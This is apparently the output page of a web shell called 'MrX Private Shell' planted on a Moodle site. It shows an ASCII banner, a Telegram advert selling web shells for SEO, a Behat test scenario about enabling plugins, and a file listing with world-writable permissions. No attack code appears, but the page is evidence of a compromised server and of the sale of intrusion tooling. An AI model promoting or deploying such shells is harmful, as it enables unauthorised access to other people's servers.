__ __ __ __ _____ _ _ _____ _ _ _ | \/ | \ \ / / | __ \ (_) | | / ____| | | | | | \ / |_ __\ V / | |__) | __ ___ ____ _| |_ ___ | (___ | |__ ___| | | | |\/| | '__|> < | ___/ '__| \ \ / / _` | __/ _ \ \___ \| '_ \ / _ \ | | | | | | |_ / . \ | | | | | |\ V / (_| | || __/ ____) | | | | __/ | | |_| |_|_(_)_/ \_\ |_| |_| |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1 if you need WebShell for Seo everyday contact me on Telegram Telegram Address : @jackleetFor_More_Tools:
@tool @tool_generator @_file_upload
Feature: Make test scenario can execute specific steps
In order to create all sort of testing scenarios
As a developer
I need to execute some generic steps in the current instance
@javascript
Scenario: Make test scenario can enable and disable plugins
Given I disable "page" "mod" plugin
And I log in as "admin"
And I navigate to "Development > Create testing scenarios" in site administration
And I upload "admin/tool/generator/tests/fixtures/testscenario/scenario_plugins.feature" file to "Feature file" filemanager
And I press "Import"
And I should see "Scenario: Course with some disabled plugins"
When I am on "C1" course homepage with editing mode on
And I click on "Add an activity or resource" "button" in the "Section 1" "section"
Then I should see "Page" in the "Add an activity or resource" "dialogue"
And I should not see "Book" in the "Add an activity or resource" "dialogue"
| Name | Type | Size | Permission | Actions |
|---|---|---|---|---|
| make_test_course.feature | File | 1.46 KB | 0777 |
|
| testscenario.feature | File | 6.15 KB | 0777 |
|
| testscenario_steps.feature | File | 976 B | 0777 |
|